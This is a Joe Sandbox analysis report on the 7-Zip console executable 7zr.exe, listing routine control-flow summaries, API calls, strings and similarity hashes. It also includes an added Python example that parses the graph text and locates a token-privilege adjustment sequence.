6f0054 __EH_prolog 77275->77276 
                               control_flow_graph (execution graph, continued; rendered graph omitted): the remaining nodes cover the routines at 6bb144, 6dd3c2, 6c1ade, 6bb5d9, 6c459e, 736bc6, 6b42d1 and 6eacd3. APIs on these nodes: malloc, free, _CxxThrowException, VariantClear, SysStringLen, CloseHandle, GetLastError, VirtualFree, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges. The routine at 6b9313 (reached from 6c1eb9) runs GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW and AdjustTokenPrivileges, with GetLastError on one branch, then CloseHandle: the standard sequence for enabling a privilege on the process token.
                              APIs
                              • __EH_prolog.LIBCMT ref: 006F81F1
                                • Part of subcall function 006FF749: _CxxThrowException.MSVCRT(?,00764A58), ref: 006FF792
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                               • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: ExceptionH_prologThrow
                              • String ID:
                              • API String ID: 461045715-3916222277
                              • Opcode ID: 8b65da886f3ac493fc931a174eb2f5c1e601720bd516134bbe1547a42d7c4615
                              • Instruction ID: 0b99f4b2d359d0391d1f26779bc4da496751d1bda0f25179f7c12956af61ff2c
                              • Opcode Fuzzy Hash: 8b65da886f3ac493fc931a174eb2f5c1e601720bd516134bbe1547a42d7c4615
                              • Instruction Fuzzy Hash: 32928B31900249DFDB15DFA8C854BEEBBB2BF09304F244099E915AB392CB75AE45CB61
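The edge lists that accompany each control-flow graph are the text behind the rendered picture: a decimal node id, the block address (or address range), label tokens such as API names, `call <addr>` references and counts like `3 API calls`, and `src->dst` edges. The parser below is an added example, not part of the Joe Sandbox report and not 7-Zip code; the format description is inferred from the text on this page, the function names are mine, and the sample input is an excerpt of this page's execution-graph text for the routine at 6b9313. It walks the graph from a chosen node, collects the ordered API names along each acyclic path, and reports the first path that performs the token-privilege adjustment sequence (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges).

```python
"""Extract ordered API-call sequences from a Joe Sandbox control-flow-graph dump.

Example code added to this page; it is not part of the Joe Sandbox report and
not 7-Zip code. The text format assumed is the one visible in the report:
  <id> <addr | addr-addr> [label tokens ...]   a node (basic block or routine)
  <src>-><dst>                                 a directed edge between node ids
Label tokens carry API names ("VariantClear"), "call <addr>" references and
counts such as "3 API calls"; only API names are kept here.
"""
import re
from collections import defaultdict

NODE_ADDR = re.compile(r"^[0-9a-f]{4,8}(?:-[0-9a-f]{4,8})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
NOISE = {"call", "API", "calls", "library", "ctype", "*"}

# Standard sequence for enabling a privilege on the current process token.
PRIV_PATTERN = ("OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges")

# Constructed sample: an excerpt of this report's execution-graph text for the
# routine at 6b9313, reached from 6c1eb9 (node ids are the report's own).
SAMPLE = (
    "77496 6c1eb9 77444->77496 "
    "77506 6b9313 GetCurrentProcess OpenProcessToken 77496->77506 "
    "77507 6b933a LookupPrivilegeValueW 77506->77507 "
    "77508 6b9390 77506->77508 "
    "77509 6b934c AdjustTokenPrivileges 77507->77509 "
    "77510 6b9382 77507->77510 77509->77510 "
    "77512 6b9372 GetLastError 77509->77512 "
    "77511 6b9385 CloseHandle 77510->77511 "
    "77511->77508 77512->77511"
)


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (addr, labels), edges maps id -> [ids]."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(list)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
            i += 1
            continue
        # A node definition is a decimal id immediately followed by an address;
        # a bare count such as the "3" in "3 API calls" is followed by a word.
        if tok.isdigit() and i + 1 < len(tokens) and NODE_ADDR.match(tokens[i + 1]):
            current = tok
            nodes[current] = (tokens[i + 1], [])
            i += 2
            continue
        if current is not None:
            nodes[current][1].append(tok)
        i += 1
    return nodes, dict(edges)


def api_names(labels):
    """Keep label tokens that name an API; drop counts, addresses and filler words."""
    return [t for t in labels
            if t not in NOISE and not t.isdigit() and not NODE_ADDR.match(t) and IDENT.match(t)]


def api_paths(nodes, edges, start, max_paths=1000):
    """Enumerate API-name sequences along acyclic paths from node `start`.

    Path enumeration is exponential on large graphs, so stop after max_paths.
    """
    results = []

    def walk(node, seq, seen):
        if len(results) >= max_paths:
            return
        seq = seq + api_names(nodes.get(node, ("", []))[1])
        nxt = [n for n in edges.get(node, []) if n not in seen]
        if not nxt:
            results.append(seq)
            return
        for n in nxt:
            walk(n, seq, seen | {n})

    walk(start, [], {start})
    return results


def contains_in_order(seq, pattern):
    """True if every name in `pattern` occurs in `seq`, in that relative order."""
    it = iter(seq)
    return all(any(name == tok for tok in it) for name in pattern)


def find_privilege_adjustment(text, start):
    """Return the first API sequence from `start` that adjusts a token privilege, else None."""
    nodes, edges = parse_graph(text)
    for seq in api_paths(nodes, edges, start):
        if contains_in_order(seq, PRIV_PATTERN):
            return seq
    return None


if __name__ == "__main__":
    hit = find_privilege_adjustment(SAMPLE, "77496")
    print("privilege adjustment path:", " -> ".join(hit) if hit else "none")
```

The same parser accepts the per-function graphs on this page, whose nodes carry address ranges (`6ea013-6ea01a`) and `call <addr>` references; those references are dropped, so only imported API names appear in the sequences. On the sample the first matching path is GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, CloseHandle; the branch through GetLastError is a separate path, which matters because AdjustTokenPrivileges can return success while GetLastError reports ERROR_NOT_ALL_ASSIGNED.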

                               Control-flow Graph

                               control_flow_graph (rendered graph omitted): routine at 6ea013, basic blocks 6ea013 through 6eacb5 (node ids up to 268). The blocks call fputs repeatedly together with the internal routines 6b1fa0, 6b2201 and 6b1fb3 and emit the summary strings listed under String ID (7zCon.sfx, Archives:, Files:, Folders:, Size:, Compressed:, Archives with Errors:, and the rest). The entry at 6ea42c shares this graph's blocks from 6ea546 onward.
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                               • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$ExceptionThrow
                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&w$p&w$N
                              • API String ID: 3665150552-3419150154
                              • Opcode ID: adfa83e990af3acfa36323dedf162b5efb8eb185dc9a03e99ca7ea345865d5a6
                              • Instruction ID: 75f44dcf27e530c853795207e1d29efa79defc371baba3f1dda42645ce7e288f
                              • Opcode Fuzzy Hash: adfa83e990af3acfa36323dedf162b5efb8eb185dc9a03e99ca7ea345865d5a6
                              • Instruction Fuzzy Hash: 59529C70901298DFCF66DBA5C895BEEBBF6AF44300F14409EE44AA7291DB346E84CF15

                               Control-flow Graph

                               control_flow_graph (rendered graph omitted): entry at 6ea42c, basic blocks 6ea42c through 6eacb5 (node ids 274 to 472). The first block writes "Scanning the drive for archives:" via fputs; from 6ea546 onward the blocks are those of the 6ea013 graph.
                              APIs
                              • fputs.MSVCRT(Scanning the drive for archives:), ref: 006EA43E
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                               • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputcfputs
                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&w$p&w$!"$N
                              • API String ID: 269475090-1564544673
                              • Opcode ID: ee82b83acb58a397bd16dcb558836c03355202cfc38c9906973d5de84d805467
                              • Instruction ID: 32d1fbdb6bb92ed8e991a1b4b4a54cb2fbda455cbb2e9f077aea009182e096de
                              • Opcode Fuzzy Hash: ee82b83acb58a397bd16dcb558836c03355202cfc38c9906973d5de84d805467
                              • Instruction Fuzzy Hash: 2B229A709012889FDF66EBA5C895BEDFBF6AF44300F14409EE44AA7291DB346E84CF15

                               Control-flow Graph

                               control_flow_graph (rendered graph omitted): routine at 6e8012, basic blocks 6e8012 through 6e82b9 (node ids 777 to 839). It calls fputs, SysFreeString at three sites and VariantClear through 6b965d; the loop over 6e81fd to 6e8271 releases a BSTR and a VARIANT on each iteration.
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E8017
                              • fputs.MSVCRT ref: 006E804D
                                • Part of subcall function 006E8341: __EH_prolog.LIBCMT ref: 006E8346
                                • Part of subcall function 006E8341: fputs.MSVCRT ref: 006E835B
                                • Part of subcall function 006E8341: fputs.MSVCRT ref: 006E8364
                              • fputs.MSVCRT ref: 006E807A
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                                • Part of subcall function 006B965D: VariantClear.OLEAUT32(?), ref: 006B967F
                              • SysFreeString.OLEAUT32(00000000), ref: 006E81AA
                              • fputs.MSVCRT ref: 006E81CD
                              • SysFreeString.OLEAUT32(00000000), ref: 006E8267
                              • SysFreeString.OLEAUT32(00000000), ref: 006E82B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                               • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                              • String ID: --$----$Path$Type$Warning: The archive is open with offset
                              • API String ID: 2889736305-3797937567
                              • Opcode ID: 8649e65e8bd05d02f71fa31ba1d0721e83f9623f01bb600a529554d47e53d556
                              • Instruction ID: 52fa88a0054d3a3ab2045be9401ed2b5fc73043e47b276f29eddfefb334aacf1
                              • Opcode Fuzzy Hash: 8649e65e8bd05d02f71fa31ba1d0721e83f9623f01bb600a529554d47e53d556
                              • Instruction Fuzzy Hash: 36918B71A01745EFDB14DFA5C981AEEB7B6FF48310F20412DE50AA7291DB70AE05CB64

                               Control-flow Graph

                               control_flow_graph (rendered graph omitted): routine at 6e6766, basic blocks 6e6766 through 6e695a (node ids 846 to 889). It enters the critical section at 00772938 on entry (6e6781), writes through fputs, and leaves the critical section at 6e6944 before returning.
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E676B
                              • EnterCriticalSection.KERNEL32(00772938), ref: 006E6781
                              • fputs.MSVCRT ref: 006E680B
                              • LeaveCriticalSection.KERNEL32(00772938), ref: 006E6944
                                • Part of subcall function 006EC7D7: fputs.MSVCRT ref: 006EC840
                              • fputs.MSVCRT ref: 006E6851
                                • Part of subcall function 006B2201: fputs.MSVCRT ref: 006B221E
                              • fputs.MSVCRT ref: 006E68D9
                              • fputs.MSVCRT ref: 006E68F6
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                              • String ID: v$8)w$8)w$Sub items Errors:
                              • API String ID: 2670240366-2667054159
                              • Opcode ID: 5ac720f2412acf097fc64a21aa0a1d9b25cb1b1d9b7b2aa767a1dd4b14b95211
                              • Instruction ID: b28aafd8b58920eb84b267b1fb62f601ddee393a33825ab22a550ea87aa3eef9
                              • Opcode Fuzzy Hash: 5ac720f2412acf097fc64a21aa0a1d9b25cb1b1d9b7b2aa767a1dd4b14b95211
                              • Instruction Fuzzy Hash: 0F51CF31502780DFCB259F61D8A4AEAB7E3FFA4350F54842DE19A8B261CB747C85CB54

                               Control-flow Graph

                               control_flow_graph (rendered graph omitted): routine at 6e6359, basic blocks 6e6359 through 6e66fd (node ids 898 to 1003). It writes the ERRORS: and WARNINGS: headings and "Can't allocate required memory" via fputs, flushes through 6b1f91 (fflush) and frees buffers through 6b1e40 (free).
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E635E
                              • fputs.MSVCRT ref: 006E645F
                                • Part of subcall function 006EC7D7: fputs.MSVCRT ref: 006EC840
                              • fputs.MSVCRT ref: 006E6547
                              • fputs.MSVCRT ref: 006E665F
                              • fputs.MSVCRT ref: 006E66AE
                                • Part of subcall function 006B1F91: fflush.MSVCRT ref: 006B1F93
                                • Part of subcall function 006B1FB3: __EH_prolog.LIBCMT ref: 006B1FB8
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                               • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$H_prolog$fflushfree
                              • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                              • API String ID: 1750297421-1898165966
                              • Opcode ID: 445b5695cb18d714ac497d833776b84f835ee5eb18e3471f807b107ae69a9918
                              • Instruction ID: ed84552b95a038d88da04fbf8207de8de94865056a5a6c4f239de9ed13dc03f8
                              • Opcode Fuzzy Hash: 445b5695cb18d714ac497d833776b84f835ee5eb18e3471f807b107ae69a9918
                              • Instruction Fuzzy Hash: ECB199706027419FDB64EF61C9A1BEAB7F3BF54344F40882DE55A4B292CB70A984CF54
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                               • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmp
                               • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$H_prolog
                              • String ID: =
                              • API String ID: 2614055831-2525689732
                              • Opcode ID: 1326ae821c1347fd92cd41a9e29ebabd646dabef081feedd9b0b5439abcdf78c
                              • Instruction ID: d2e29914686dbfc469503ce51ece7162d5f0119b811619756bd899bb30b8fe13
                              • Opcode Fuzzy Hash: 1326ae821c1347fd92cd41a9e29ebabd646dabef081feedd9b0b5439abcdf78c
                              • Instruction Fuzzy Hash: 6A219D72905248AFCF49EB94D952AEEBBB6EF44310F20002EE40573191DF756E85CB98
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E8346
                              • fputs.MSVCRT ref: 006E835B
                              • fputs.MSVCRT ref: 006E8364
                                • Part of subcall function 006E83BF: __EH_prolog.LIBCMT ref: 006E83C4
                                • Part of subcall function 006E83BF: fputs.MSVCRT ref: 006E8401
                                • Part of subcall function 006E83BF: fputs.MSVCRT ref: 006E8437
                              Strings
                              Similarity
                              • API ID: fputs$H_prolog
                              • String ID: =
                              • API String ID: 2614055831-2525689732
                              • Opcode ID: e680bc74540a0320fbd976458ceeb9891fe12c81ffd57031d3bb14e406a3cbed
                              • Instruction ID: bcd45e02a9199fc6d957359f41661d19d91229284ccf3008761afd350703cf7f
                              • Opcode Fuzzy Hash: e680bc74540a0320fbd976458ceeb9891fe12c81ffd57031d3bb14e406a3cbed
                              • Instruction Fuzzy Hash: F901A771A00544ABCB05BBA5D822AEE7B77EF84750F00401DF40556191CF784A96DB95
                              APIs
                              • __EH_prolog.LIBCMT ref: 006D209B
                                • Part of subcall function 006B757D: GetLastError.KERNEL32(006BD14C), ref: 006B757D
                                • Part of subcall function 006D2C6C: __EH_prolog.LIBCMT ref: 006D2C71
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                              Strings
                              Similarity
                              • API ID: H_prolog$ErrorLastfree
                              • String ID: Cannot find archive file$The item is a directory
                              • API String ID: 683690243-1569138187
                              • Opcode ID: 1ec2a1bbd9d7980ab7947dde13e14ca168fe7e5138a8963128fc17c0c07c7e6d
                              • Instruction ID: 849e097036076aa5f7a6cfd9d5ea1f3b00705d186ff90d26f879408635c24780
                              • Opcode Fuzzy Hash: 1ec2a1bbd9d7980ab7947dde13e14ca168fe7e5138a8963128fc17c0c07c7e6d
                              • Instruction Fuzzy Hash: 98724970D00259DFCB65DF68C8A4BDDBBB2AF59300F14409AE859AB352CB70AE81CF55
                              APIs
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                              • memset.MSVCRT ref: 006DAEBA
                              • memset.MSVCRT ref: 006DAECD
                                • Part of subcall function 006F04D2: _CxxThrowException.MSVCRT(?,00764A58), ref: 006F04F8
                              Strings
                              Similarity
                              • API ID: memset$ExceptionThrowfree
                              • String ID: Split
                              • API String ID: 1404239998-1882502421
                              • Opcode ID: 2f715c1dce0df3d02a183103560cefd40c5c989a88c8e1386e2f561ee1a3da05
                              • Instruction ID: 27d2b6f60b32149e5f1853d05429e02b5dd339c72d24f9ac3f8bb897d316f43b
                              • Opcode Fuzzy Hash: 2f715c1dce0df3d02a183103560cefd40c5c989a88c8e1386e2f561ee1a3da05
                              • Instruction Fuzzy Hash: 1F425A70E04249DFDF25DBA4C994BEDBBB2AF05314F14409AE449AB351CB71AE86CF12
                              APIs
                              • __EH_prolog.LIBCMT ref: 006B609B
                                • Part of subcall function 006B6BF5: __EH_prolog.LIBCMT ref: 006B6BFA
                                • Part of subcall function 006B6BF5: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 006B6C1A
                                • Part of subcall function 006B6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 006B6C49
                              • DeleteFileW.KERNELBASE(?,?,?,00000000), ref: 006B60DF
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000), ref: 006B6111
                                • Part of subcall function 006B5A8C: __EH_prolog.LIBCMT ref: 006B5A91
                                • Part of subcall function 006B5A8C: SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 006B5AB7
                              Similarity
                              • API ID: File$AttributesH_prolog$Delete
                              • String ID:
                              • API String ID: 579516761-0
                              • Opcode ID: 25bdaf976a40e2dcbb68c5f8f2f517076784a457ea0aa0e58e75d16ab5b218f5
                              • Instruction ID: c4a41749d47fcdbc34b58af9021984bda47e0e3d04b01e7b480fb38c4213a310
                              • Opcode Fuzzy Hash: 25bdaf976a40e2dcbb68c5f8f2f517076784a457ea0aa0e58e75d16ab5b218f5
                              • Instruction Fuzzy Hash: 6E11E9F2A00204978E147679D5526FE7B579F823A4F144129FD12573D2CE298CC69760
                              APIs
                              • fputs.MSVCRT ref: 006E8437
                              • fputs.MSVCRT ref: 006E8401
                                • Part of subcall function 006B1FB3: __EH_prolog.LIBCMT ref: 006B1FB8
                              • __EH_prolog.LIBCMT ref: 006E83C4
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                              Similarity
                              • API ID: H_prologfputs$fputc
                              • String ID:
                              • API String ID: 678540050-0
                              • Opcode ID: 67c57f00313b4593704319d0391d2858bbe5740e2a94f71ba74c919c7898a8a0
                              • Instruction ID: a5771999cc3ec8b53710a827e1409d85b56d788089276bd098113dabaed0335d
                              • Opcode Fuzzy Hash: 67c57f00313b4593704319d0391d2858bbe5740e2a94f71ba74c919c7898a8a0
                              • Instruction Fuzzy Hash: 4E1151B1A04215ABCB4AB7A1D8235EEBBFBDF41750F40002DF501972D1DF695985C798
                              APIs
                              Strings
                              Similarity
                              • API ID: fputs
                              • String ID: Open
                              • API String ID: 1795875747-71445658
                              • Opcode ID: fe27af77eff6ab77d0151f18d4012ea557cf39d600435308a3a0809abfbfe3c0
                              • Instruction ID: cc80883896bd0a2cbcc822e2e84f326791fc4b47284adb8cd2ecf9a7fbb45f86
                              • Opcode Fuzzy Hash: fe27af77eff6ab77d0151f18d4012ea557cf39d600435308a3a0809abfbfe3c0
                              • Instruction Fuzzy Hash: 6A1102720027449FD761EF39DCA1ADABBE6FF21310F40842EE19A87212DB75A844CF58
                              APIs
                              • __EH_prolog.LIBCMT ref: 007006B3
                              • _CxxThrowException.MSVCRT(?,0076D480), ref: 007008F2
                                • Part of subcall function 006B1E0C: malloc.MSVCRT ref: 006B1E1F
                                • Part of subcall function 006B1E0C: _CxxThrowException.MSVCRT(?,00764B28), ref: 006B1E39
                              Similarity
                              • API ID: ExceptionThrow$H_prologmalloc
                              • String ID:
                              • API String ID: 3044594480-0
                              • Opcode ID: 873ef010ea6bd353f82d635554cf9c150a359b209831a6652d80f5cbddaa1b69
                              • Instruction ID: cfc9c6fbebf35abb7ee3dfa40d9160837da5145fa98bcd48ca2d17bc32fec56e
                              • Opcode Fuzzy Hash: 873ef010ea6bd353f82d635554cf9c150a359b209831a6652d80f5cbddaa1b69
                              • Instruction Fuzzy Hash: 14914C70900249DFCF21DFA8C891AEEBBB6BF09314F14819DE545A7292C734AE45CFA1
                              APIs
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 46c9997dfd5f977fb9e37b65a7a9e60f2dda0a5a255bf75eb15b75cd4f247e44
                              • Instruction ID: 1f5a680eb4f30266ae47130dd00b44e9c858767f5e4ff923756862dd88d2d456
                              • Opcode Fuzzy Hash: 46c9997dfd5f977fb9e37b65a7a9e60f2dda0a5a255bf75eb15b75cd4f247e44
                              • Instruction Fuzzy Hash: 25F19A70504785DFCB21CF64C594AFABBE2FF15304F64886EE49A9B311D730A984CB6A
                              APIs
                              • __EH_prolog.LIBCMT ref: 006C4255
                                • Part of subcall function 006C440B: __EH_prolog.LIBCMT ref: 006C4410
                                • Part of subcall function 006B1E0C: malloc.MSVCRT ref: 006B1E1F
                                • Part of subcall function 006B1E0C: _CxxThrowException.MSVCRT(?,00764B28), ref: 006B1E39
                              Similarity
                              • API ID: H_prolog$ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 3744649731-0
                              • Opcode ID: 6fdad4b41a5f687f1f481b6766435e957518720510eb5ad416ef2f2a4d606ede
                              • Instruction ID: 95c95946440c4a479a1b77c883732c68248e9f0021840566acc1df64538e4a33
                              • Opcode Fuzzy Hash: 6fdad4b41a5f687f1f481b6766435e957518720510eb5ad416ef2f2a4d606ede
                              • Instruction Fuzzy Hash: 5951E7B0401784CFC725DF69C194ADAFBF0FF19304F5488AEC49A97652D7B4AA09CB61
                              APIs
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 3b304273a3beee0661173d756adcd7a42adac0f179d76835ddc8c7bc6b505b4f
                              • Instruction ID: bc43439c7ea33e64770e0588ababb440b518795b715900fe34df88d063513138
                              • Opcode Fuzzy Hash: 3b304273a3beee0661173d756adcd7a42adac0f179d76835ddc8c7bc6b505b4f
                              • Instruction Fuzzy Hash: 8C3118B0D00249DBDB14EF95C8A19EEBBBAFF85360F20811EE42667341C7309D01CBA0
                              APIs
                              • __EH_prolog.LIBCMT ref: 006D021F
                                • Part of subcall function 006C3D66: __EH_prolog.LIBCMT ref: 006C3D6B
                                • Part of subcall function 006C3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3D7D
                                • Part of subcall function 006C3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3D94
                                • Part of subcall function 006C3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 006C3DB6
                                • Part of subcall function 006C3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3DCB
                                • Part of subcall function 006C3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3DD5
                              Similarity
                              • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID:
                              • API String ID: 1532160333-0
                              • Opcode ID: 83dd22542ed76898e4720160facb84efc1bf7c9f2280db66827b3dc4cf066311
                              • Instruction ID: 1eb02a3c1e6fd3d8cef7810eaf139b3f782ed3aa42860055725e482ba36f2b7d
                              • Opcode Fuzzy Hash: 83dd22542ed76898e4720160facb84efc1bf7c9f2280db66827b3dc4cf066311
                              • Instruction Fuzzy Hash: 4C2139B1846B90CFC361CF6A86D0686FFF4BB19600B94996ED0DA83B12C374B508CF55
                              APIs
                              • __EH_prolog.LIBCMT ref: 006F0364
                                • Part of subcall function 006F01C4: __EH_prolog.LIBCMT ref: 006F01C9
                                • Part of subcall function 006F0143: __EH_prolog.LIBCMT ref: 006F0148
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                                • Part of subcall function 006F03D8: __EH_prolog.LIBCMT ref: 006F03DD
                                • Part of subcall function 006F004A: __EH_prolog.LIBCMT ref: 006F004F
                              Similarity
                              • API ID: H_prolog$free
                              • String ID:
                              • API String ID: 2654054672-0
                              • Opcode ID: d4016c569769dacceb7c4d641dd74a787e8272fa46d2f588099d3436bdecfbb7
                              • Instruction ID: 626e6c4e902d017fcffbf47dcf00257d104cf701f68abf568e328ebefb3d34c0
                              • Opcode Fuzzy Hash: d4016c569769dacceb7c4d641dd74a787e8272fa46d2f588099d3436bdecfbb7
                              • Instruction Fuzzy Hash: 42F02170904A54EADB09EBA8C4223EDBBE2AF01304F10466CE452622C2CBB86A048748
                              APIs
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 4f9efaf067742a519827546206523687b7d82a1638187617026c65a741b3870a
                              • Instruction ID: 2583d9c51794e4e4ec76a5b47fbae0543523b795a537b9093f2969bbdb26eccb
                              • Opcode Fuzzy Hash: 4f9efaf067742a519827546206523687b7d82a1638187617026c65a741b3870a
                              • Instruction Fuzzy Hash: E0F0AF72E0115AEFCB04DF99D8408EFBB76FF44790B00806AF419E7251DB348A05CBA4
                              APIs
                              Similarity
                              • API ID: fputs
                              • String ID:
                              • API String ID: 1795875747-0
                              • Opcode ID: fe164f351da1ce45375d72323aa2522e7b4c586a764b9af7b9fd4a52e81d0d5c
                              • Instruction ID: 2aed68cb1cc44e3066295d2a3c65b3bb33d0b9d6df7331e554f0da6fbb9c894a
                              • Opcode Fuzzy Hash: fe164f351da1ce45375d72323aa2522e7b4c586a764b9af7b9fd4a52e81d0d5c
